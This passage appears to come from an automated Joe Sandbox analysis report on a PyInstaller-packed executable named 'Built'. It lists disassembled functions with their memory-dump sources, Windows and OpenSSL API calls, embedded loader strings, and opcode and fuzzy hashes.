                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                              • Instruction Fuzzy Hash: 4712D736E0C24386FF209A15E856679F661FB40754F884135E699C7AC6DF7EE880AF03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2050909247-3659356012
                                                              • Opcode ID: 6c44fc12f90ac9abec2ec16274bdf5e9c83ab404e8f3d54f1266a05c4574213e
                                                              • Instruction ID: ea459771d120b28ccf55a19ca2f26ea919cbe2c3e5c55044ade80ddbd5e43963
                                                              • Opcode Fuzzy Hash: 6c44fc12f90ac9abec2ec16274bdf5e9c83ab404e8f3d54f1266a05c4574213e
                                                              • Instruction Fuzzy Hash: F041A021B0865382EE20DB12EC616B9A394FF94BC4F544432ED0C97796DE7EE105AB43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastsetsockopt
                                                              • String ID: ..\s\crypto\bio\b_sock2.c$o
                                                              • API String ID: 1729277954-1872632005
                                                              • Opcode ID: 55b9dc58d84091389097999520ee8ef412c939128f98883080a21d6a8e2db22d
                                                              • Instruction ID: 519b093255519e7fcd3b3492249db49dd927d3318c79c98b72f1a5583eaa0325
                                                              • Opcode Fuzzy Hash: 55b9dc58d84091389097999520ee8ef412c939128f98883080a21d6a8e2db22d
                                                              • Instruction Fuzzy Hash: 49519F32B0854287E720DB21E824ABA77A4FB81748F548235EA6947ADDCF3DE545DB40
                                                              APIs
                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF626643CBB), ref: 00007FF6266488F4
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF626643CBB), ref: 00007FF6266488FA
                                                              • CreateDirectoryW.KERNEL32(?,00000000,00007FF626643CBB), ref: 00007FF62664893C
                                                                • Part of subcall function 00007FF626648A20: GetEnvironmentVariableW.KERNEL32(00007FF62664388E), ref: 00007FF626648A57
                                                                • Part of subcall function 00007FF626648A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF626648A79
                                                                • Part of subcall function 00007FF6266582A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6266582C1
                                                                • Part of subcall function 00007FF626642810: MessageBoxW.USER32 ref: 00007FF6266428EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                              • API String ID: 3563477958-1339014028
                                                              • Opcode ID: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
                                                              • Instruction ID: d1c2097c09a65ae52e3de87895b7cb93a422814bcefb53fe74365e0db9a5539d
                                                              • Opcode Fuzzy Hash: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
                                                              • Instruction Fuzzy Hash: FF41A221A19A8354FE20AB66AC662B91391BF857C4F400135ED0DC77D6DE7EE504EB03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc
                                                              • String ID: OPENSSL_Applink$OPENSSL_Uplink(%p,%02X): $_ssl.pyd$_ssl_d.pyd
                                                              • API String ID: 1883125708-1130596517
                                                              • Opcode ID: a59ad196c7dd92c8529259541892207718703ab64594e6dd5a010e556f2476ad
                                                              • Instruction ID: f6e89db7f4b3299a6f7a1e2ea2691845e4bfdc763bae2cf92f33481fe04ba35a
                                                              • Opcode Fuzzy Hash: a59ad196c7dd92c8529259541892207718703ab64594e6dd5a010e556f2476ad
                                                              • Instruction Fuzzy Hash: B3511222E08B5382E711AF64E96097423E8BF69B68F059735D97D422E9DF7CB585C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                                              • String ID: Service-0x$_OPENSSL_isservice
                                                              • API String ID: 1944374717-1672312481
                                                              • Opcode ID: bc225b995bbff2d3b119e7081b5c779a5c3234c2f77d3222796a288c2c9d01dd
                                                              • Instruction ID: 2389c5e570f6dd94bfd1ea696d2b3deab53c6545e22cfaa88aae338dc515a987
                                                              • Opcode Fuzzy Hash: bc225b995bbff2d3b119e7081b5c779a5c3234c2f77d3222796a288c2c9d01dd
                                                              • Instruction Fuzzy Hash: F1416F22B09B8686EF509F25D860AA92398FF497B4B484734E93D477E9EF3CE5058340
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                              • Instruction ID: 5f6e5a8d7ce8e0709680fd795fe98228c59e7ffb7f5205fd67780d0096b8d917
                                                              • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                              • Instruction Fuzzy Hash: 5AD18272A087818AEF309BA5D8503AE37A0FB95788F100135EE4D97B95DF7AE440DB43
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62665F11A,?,?,000002B9B7119798,00007FF62665ADC3,?,?,?,00007FF62665ACBA,?,?,?,00007FF626655FAE), ref: 00007FF62665EEFC
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62665F11A,?,?,000002B9B7119798,00007FF62665ADC3,?,?,?,00007FF62665ACBA,?,?,?,00007FF626655FAE), ref: 00007FF62665EF08
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                              • Instruction ID: eefb4ea9b3849d784e0029f3cee8cd32d2a6c79f7804c6edab273b240fc2dec5
                                                              • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                              • Instruction Fuzzy Hash: D9414321B28A5281FF16CB52AC456752391BF49BD0F884139EC1DCB385EF3EE405AB83
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642C9E
                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642D63
                                                              • MessageBoxW.USER32 ref: 00007FF626642D99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Message$CurrentFormatProcess
                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                              • API String ID: 3940978338-251083826
                                                              • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                              • Instruction ID: 704e3d742f45a51c86662386fcc1f1352d8b00ffb4fe915c2e67ada048d927d3
                                                              • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                              • Instruction Fuzzy Hash: 4F31F622708A4182EA20AB21BC502BA6795BF88BC8F400136EF4DD7759DF7DD516DB02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: Fiber$Switch$CreateDelete
                                                              • String ID: *$..\s\crypto\async\async.c
                                                              • API String ID: 2050058302-1471988776
                                                              • Opcode ID: 8b47d52157642b3b231a89f983280538087bbf6d36b46edcb8fde1806918482b
                                                              • Instruction ID: ec535f76c2062b59f24d164aac7fb0f816c3f5027497cc0ae0bff71ef8f8d015
                                                              • Opcode Fuzzy Hash: 8b47d52157642b3b231a89f983280538087bbf6d36b46edcb8fde1806918482b
                                                              • Instruction Fuzzy Hash: BDA18C32B19A4282EB20DF16E460A7973A8FF44B94F488435DAAD477E9EF3CE545D700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: OPENSSL_ia32cap$~$~$~$~
                                                              • API String ID: 1431749950-1981414212
                                                              • Opcode ID: 2634814bda47d7719d861af1cfec94a442d099e0f6a35619a322e4b16ada4e8f
                                                              • Instruction ID: f6397795fc6b6abbd92e9b22b57eb95a6970612f8f5ef0339d02f0160bdbe07b
                                                              • Opcode Fuzzy Hash: 2634814bda47d7719d861af1cfec94a442d099e0f6a35619a322e4b16ada4e8f
                                                              • Instruction Fuzzy Hash: 59418226F0875B87EB10AB41A4649F922E8FB58B80F444035D96D576DCEF3DE44AC740
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDBD
                                                              • GetLastError.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDCB
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDF5
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DE63
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DE6F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                              • Instruction ID: dc1dd23729fa22ae003e52b2d1ea072889ce2dd6ba4bf803454c64b692098f93
                                                              • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                              • Instruction Fuzzy Hash: B931D021F0A68381EE229B02AC501B8A394FF58BA4F490535EE1D873C0EF7DE4449B43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
